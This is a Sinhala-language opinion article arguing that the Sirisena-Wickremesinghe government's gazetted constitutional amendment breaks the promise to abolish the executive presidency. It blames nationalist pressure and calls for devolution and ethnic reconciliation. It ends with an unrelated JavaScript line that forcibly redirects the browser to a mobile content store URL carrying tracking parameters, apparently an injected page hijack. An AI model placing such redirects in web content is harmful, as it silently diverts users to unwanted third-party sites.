විධායක ජනාධිපති ක‍්‍රමය අහෝසි කිරීම මෛත‍්‍රී-රනිල් ආණ්ඩුව පොරොන්දු කඩ කරයි ද?

කුමුදු කුසුම් කුමාර

මෛත‍්‍රීපාල සිරිසේන මෙරට ජනාධිපති ධුරයට පත්වන්නේ මිලියන හයකුත් ලක්ෂ දෙකක් ඉක්මවූ ජනතාවකගේ ඡුන්දයෙනි. ඔහු මෙම ජනතාවට දුන් ප‍්‍රධානම මැතිවරණ පොරොන්දුව ඔහුගේ ”මෛත‍්‍රී පාලනයක් – ස්ථාවර රටක්” මැතිවරණ ප‍්‍රකාශනයේ 14 වැනි පිටුවේ සඳහන්ව ඇත්තේ ”අසීමිත බලතල සහිත විධායක ජනාධිපති ක‍්‍රමය අහෝසි කිරීම” යන සිරස්තලය යටතේ ය. ඔහු ජනාධිපතිවරණයට පොදු අපේක්ෂකයා වශයෙන් ඉදිරිපත්වීමට හේතුව වශයෙන් දක්වා ඇත්තේ ද ”මෙම කර්තව්‍යය සම්පූර්ණ කරලීම”ය. එම සංශෝධනය සඳහා එක්සත් ජාතික පක්ෂය තමා සමග ගිවිසුම් ගත වී ඇති බවට මෙන්ම ඒ සඳහා ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ මන්ත‍්‍රීවරුන් ගේ සහය ද ජනතා විමුක්ති පෙරමුණේ මෙන්ම ජාතික හෙළ උරුමයේ ද සහාය තමාට ලබාගත හැකි බවට ඔහු තම මැතිවරණ ප‍්‍රකාශනයේම සහතික වීය. මේ කටයුත්ත එලෙස පොරොන්දු වූ ආකාරයෙන්ම ඉටුකිරීම ඔහුගේ වගකීමයි.

නමුත් මේ වන විට මෛත‍්‍රී-රනිල් ආණ්ඩුව ජනතාවට දුන් මෙම ප‍්‍රධානතම පොරොන්දුව කඩ කරන ආකාරයේ ව්‍යවස්ථා සංශෝධනයක් ගැසට් මගින් ප‍්‍රකාශයට පත් කොට තිබේ. එම ගැසට් නිවේදනයේ ”ජනරජයේ ජනාධිපතිවරයා” පිළිබඳ සඳහන් වන්නේ පහත සඳහන් පරිදිය:” ශ‍්‍රී ලංකා ජනරජයේ ජනාධිපතිවරයෙක් වන්නේය. ජනාධිපතිවරයා රජයේ ප‍්‍රධානයා ද විධායකයේ ප‍්‍රධානයා ද ආණ්ඩුවේ ප‍්‍රධානයා ද සන්නද්ධ සේවාවන්හි සේනාධිනායකවරයා ද වන්නේ ය.” මෙය 1978 ශ‍්‍රී ලංකා ජනරජ ව්‍යවස්ථාවේ ජනාධිපතිවරයා පිළිබඳ ඇති 30 (1) වගන්තිය කිසිදු වෙනසකින් තොරව ඒ ආකාරයෙන්ම නව යෝජිත ව්‍යවස්ථාවට 30 (1) වගන්තිය ලෙස ඇතුළු කිරීමක් පමණි.

මෙය ”නව ආණ්ඩුක‍්‍රම ව්‍යුහය අනිවාර්යයෙන්ම දැනට පවතින අත්තනෝමතික විධායක ජනාධිපති ක‍්‍රමය වෙනුවට කැබිනට් මණ්ඩලය හරහා පාර්ලිමේන්තුව හා සම්බන්ධ වූ විධායකයක් සහිත ආණ්ඩුක‍්‍රම ව්‍යුහයක් වන ඇත” යන මෛත‍්‍රී – මැතිවරණ ප‍්‍රකාශනයේ සඳහන් පොරොන්දුව එකහෙළා කඩකිරීමක් වනු ඇත.
අපට අවශ්‍ය ව්‍යවස්ථා සංශෝධනයේ තිබිය යුත්තේ ආණ්ඩුකරණයේ බලය එක් තනි පුද්ගලයෙකුට පවරන විධායක ජනාධිපති ක‍්‍රමය අහෝසි කොට පවත්නා ක‍්‍රමය යටතේ ජනතා පරමාධිපත්‍යය උපරිමයෙන් රැුකෙන පරිදි ජනතාවගේ ඡුන්දයෙන් තෝරා ගත් නියෝජිත මණ්ඩලයකින් සමන්විත පාර්ලිමේන්තුවට එම බලය පැවරීමයි. තනි අගමැති කෙනෙකුටවත් එම විධායක බලය පැවරිය යුතු නැත. අගමැති කැබිනට් මණ්ඩලයේ ප‍්‍රධානියා වන අතර කැබිනට් මණ්ඩලය පාර්ලිමේන්තුවට වගකිව යුත්තේය. ජනාධිපති හෝ වේවා අගමැති හෝ වේවා තනි පුද්ගලයෙකුට එකහෙළා විධායක බලය පැවරීම ජනතාවට පරමාධිපත්‍යය අහිමි කිරීමකි.

ජනාධිපතිවරයාට සියලූ විධායක බලතල පවරන ගැසට් කරන ලද ව්‍යවස්ථා සංශෝධනය මෛත‍්‍රීපාල සිරිසේන පරාජය කිරීමට කැප වූ පරාජිත ශ‍්‍රී ලංකා නිදහස් පක්ෂයේ සහ පාර්ලිමේන්තුවේ මන්ත‍්‍රී ආසන දෙකක් පමණක් ඇති ජාතික හෙළ උරුමයේ නායක චම්පික රණවකගේ බලකිරීම මත සිදු කොට ඇත. අගමැති රනිල් වික‍්‍රමසිංහ ප‍්‍රධාන කැබිනට් මණ්ඩලයත් මෙම යෝජනාව ඇතුළත් ව්‍යවස්ථා සංශෝධනය එපරිදිම අනුමත කොට ඇත.

යෝජිත ව්‍යවස්ථා සංශෝධනය ඒ ආකාරයෙන්ම පාර්ලිමේන්තුවේ සම්මත කොට ගතහොත් එය මෙරට ලක්ෂ හැට දෙකකට අධික ජනතාව පොදු අපේක්ෂක මෛත‍්‍රීපාල සිරිසේන කෙරෙහි තැබූ විශ්වාසය බරපතළ ලෙස කඩකිරීමක් මෙන්ම ඔහු ඔවුන්ට දුන් ප‍්‍රධානතම පොරොන්දුව කඩකිරීමක් ද වනු ඇත. මෙයින් මෛත‍්‍රීපාල සිරිසේන ජනාධිපතිවරයා පිළිබඳ මේ වනවිට ජනතාව අතර ගොඩනැඟී ඇති ප‍්‍රතිරූපය විනාශ කෙරෙනු ඇත. ඔහුත් විධායක ජනාධිපති අහෝසි කරන බවට පොරොන්දු දී ජනතාවගෙන් ඡුන්දය ඉල්ලා බලයට පැමිණ එම පොරොන්දුව කඩා දැමූ තවත් එක් ජනාධිපතිවරයෙක් ලෙස ඉතිහාසයේ කුණු බක්කියට එකතු වනු ඇත.
අප ඇසිය යුතු වන්නේ ‘මෙලෙස තම ප‍්‍රතිරූපය විනාශ කරගන්නා තැනට ජනාධිපති මෛත‍්‍රී තල්ලූ කිරීම ඉටු කරන්නේ කාගේ, කුමන අවශ්‍යතාවක්ද?’ යන්න යි.
ජේ. ආර්. ජයවර්ධන තම ඒකාධිපති ජනාධිපති ව්‍යවස්ථාව සම්මත කොට ගෙන මෙරට එතෙක් පැවති ප‍්‍රජාතන්ත‍්‍රවාදී සම්ප‍්‍රදාය විනාශ කිරීමේ ප‍්‍රතිඵලයක් ලෙස අවුලෙන් වියවුලට ගිය ලාංකේය දේශපාලනය සහ සමාජය යළි සුවපත් කිරීම ආරම්භ කිරීමේ මහඟු අවස්ථාව ජනාධිපති මෛත‍්‍රීපාලට ලැබී තිබේ. ඒ සඳහා ඔහුට දැක්මක්ද ඇති බව ජාතික සමගිය ගොඩ නැඟීම පිළිබඳ ඔහු පළ කරන අපේක්ෂාවෙන් පැහැදිලි වෙයි.

ජනාධිපති මෛත‍්‍රීපාලගේ ප‍්‍රතිරූපය විනාශ කිරීම ඉටුකරනු ඇත්තේ ජාතිවාදීන්ගේ අවශ්‍යතාවයි. ඔහු කැපවී සිටින බව පෙනෙන ජාතික සමගිය ගොඩ නැඟීම මුල් කොටගෙන ලාංකේය දේශපාලන සහ සමාජ දේහය සුවපත් කිරීමේ කර්තව්‍යය අවුල් කිරීම හරහා තම බලලෝභී ව්‍යාපෘති සාර්ථක කරගැනීම ජාතිවාදීන්ගේ අරමුණයි.
මහින්ද රාජපක්ෂ රෙජිමය යුද්ධය නිමකිරීමෙන් පසුත් සිංහලයන් තම ග‍්‍රහණයේ තබා ගැනීමට යොදා ගත් උපක‍්‍රමය නම් බෙදුම්වාදී ත‍්‍රස්තවාදය යළි හිස ඔසොවා රට බෙදනු ඇතැයි යන අනියත බිය ඔවුන් තුළ දිගින් දිගටම වගා කිරීමට කටයුතු කිරීමයි. නමුත් ලාංකේය ඡුන්දදායකයන්ගේ බහුතරය පොදු අපේක්ෂක මෛත‍්‍රී දිනවීමෙන් පෙන්නුම් කළේ තමන් එම බියෙන් බිඳුණු බවයි.

රටේ ”එක්සත්භාවය, ස්ථාවරත්වය සහ ඒකීයභාවය” රැුකගැනීම සඳහා විධායක ජනාධිපතික‍්‍රමයේ සියලූ විධායක බලතල දැන් පවත්නා අයුරින්ම පවත්වා ගත යුතුය යනුවෙන් චම්පික රණවක නගන තර්කයේද ප‍්‍රතිඵලය වන්නේද යළිත් සිංහලයන්ගේ සිත් තුළ බෙදුම්වාදයේ බිය තහවුරු කිරීමයි. (පොදු අපේක්ෂක මෛත‍්‍රී ජනාධිපති තනතුරට පත් වූයේම විධායක ජනාධිපති ක‍්‍රමය අහෝසි කරමි යන පොරොන්දුව ප‍්‍රධාන කොට ගෙන හෙයින් එසේ කරන ව්‍යවස්ථා සංශෝධනයක් ජනතා පරමාධිපත්‍යය පාර්ලිමේන්තුවට යට කිරීමකැයි චම්පික රණවක ඉදිරිපත් කරන තර්කය ව්‍යාජ එකකි.)

චම්පික රණවකලා සහ නිමල් සිරිපාලද සිල්වාලාගේ ශ‍්‍රී ලංකා නිදහස් පක්ෂයද එක්ව රට බෙදීම පිළිබඳ අනිසි බිය යළිත් දේශපාලන වේදිකාවට නංවාලීමට සමත් වුවහොත් එයම ජාතීන් අතර සමගිය ගොඩ නැංවීමේ කටයුත්ත විනාශ කිරීමේ ආරම්භය වනු ඇත යන්න ජනාධිපති මෛත‍්‍රීපාලට නොපෙනෙන්නේ යැයි අප සිතිය යුතු නැත.

ජාතීන් අතර සමගිය ගොඩ නැංවීම

ජාතීන් අතර සමගිය ගොඩ නැංවීමේ මාවත මූලිකව වැටී ඇත්තේ ජාතිවාදීන් විසින් දේශපාලන වාසි තකා යළි යළිත් මතුකරන රට බෙදීම පිළිබඳ අනියත බිය රාජපක්ෂ රෙජිමය පවත්වා ගැනීමට ඡන්දය දුන් සිංහල ඡුන්දදායකයන් වෙතින් පහ කිරීමට කටයුතු කිරීම හරහා ය. එයට දෙමළ සහ මුස්ලිම් දේශපාලන නායකයන්ගෙන්ද සමාන ප‍්‍රතිචාරයක් ලැබිය යුතුය.

යුද බියෙන් මිදුණු උතුරේ දෙමළ ජනයා බහුතරය යළි එල්ටීටීඊ ත‍්‍රස්තවාදය හිස එසවීමට පක්ෂපාතී නොවේ. ඔවුහු තමන්ගේ පළාත් සභාවක් පිහිටුවා ගනිමින් ප‍්‍රජාතන්ත‍්‍රවාදී ප‍්‍රවාහය ඉමහත් කැමැත්තෙන් වැළඳ ගෙන සිටිති. මෛත‍්‍රීපාල සිරිසේන ජනාධිපති කරවීම සඳහා ඔවුන් අතිමහත් බහුතරය ඡුන්දය දීමෙන් ප‍්‍රකාශ කර සිටියේද ජාතීන් අතර සංහිඳියාව සඳහා ඔවුන් තුළ ඇති බලවත් කැමැත්තයි. එහෙයින් රට බෙදීම පිළිබඳ බිය අනිසි බියකි. එය සේවය කරන්නේ සිංහල ජාතිවාදීන්ගේ බල ව්‍යාපෘති වලට ය.

අද අපට අවශ්‍ය වන්නේ දෙමළ මුස්ලිම් සිංහල යනාදී සියලූ ජන කොටස්වලට සමගියෙන් ජීවත් විය හැකි ලංකාවකට අවශ්‍ය දේශපාලන ව්‍යුහයන් ස්ථිර සාරව සම්පාදනය කොට ක‍්‍රියාත්මක කිරීමයි. ඒ සඳහා පළාත් සභා ක‍්‍රමය පදනමක් සපයයි. එතැනිනුත් එහාට යන දේශපාලන බල විමධ්‍යගතකරණයක් උතුරට සහ නැගෙනහිරට පමණක් නොව දකුණටද අවශ්‍යයි. ලංකාවේ සංචාරයේදී ඉන්දියානු අගමැති ‘සහයෝගිතා සන්ධීයක‍්‍රමය’ පිළිබඳ කළ සඳහන මෙහිදී අපගේ අවධානයට යොමු විය යුතුය.

මේ මොහොතේ අප කළයුත්තේ එක්සත් ලංකාවක් තුළ සමගියෙන් එක්ව විසීමට අවශ්‍ය දේශපාලන ව්‍යුහාත්මක වෙනසක් ක‍්‍රියාත්මක කිරීමේ අවශ්‍යතාව පිළිබඳ එකිනෙක ප‍්‍රජාවන් ඒත්තු ගැන්වීමට කටයුතු කිරීම යි.

මෙම වගකීම රජයට පවරා නිහඬ වී නොසිට දේශපාලන බලය විමධ්‍යගත කිරීම රට බෙදීමක් බවට පත් නොවන බව සහතික කරන උතුර-නැගෙනහිර සහ දකුණ එක් කරන දේශපාලන ව්‍යාපාරයක් ගොඩ නැංවීම දෙමළ සිංහල මුස්ලිම් ජන ප‍්‍රජාවන්හි මැදහත් දේශපාලන ක‍්‍රියාකාරකයන් ගේ සහ බුද්ධිමතුන් ගේ වගකීමයි. උතුරේ සහ දකුණේ දෙමළ සිංහල මුස්ලිම් ජාතිවාදී අන්තවාදයන් මතවාදීව සහ දේශපාලනිකව පරාජය කරන මහජන දේශපාලන ව්‍යාපාරයක් ගොඩනැංවීම කාලීන අවශ්‍යතාවයි.
විධායක ජනාධිපති ක‍්‍රමය අහෝසි කිරීමට දුන් පොරොන්දුව ඉටුකිරීමෙන් ජනාධිපති මෛත‍්‍රීපාල සිරිසේනට එබඳු ජනතා ව්‍යාපාරයක් ගොඩ නැංවීම සඳහා අවශ්‍ය දේශපාලන ගතිකයට ආරම්භයක් ලබාදිය හැකිය. එසේ නොකළහොත් ප‍්‍රජාතන්ත‍්‍රවාදයේ අපේක්ෂා කඩවූ ජනයා මෛත‍්‍රීපාල ජනාධිපතිවරයාගේ රජයෙන් වියෝවීම නොවැළැක්විය වනු ඇත. එය ලංකාවේ ජන වර්ග අතර අසමගිය තවදුරටත් පවත්වාගෙන යාම අපේක්ෂා කරන ජාතිවාදී බලවේගවල ජයග‍්‍රහණයට හේතුවනු ඇත.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;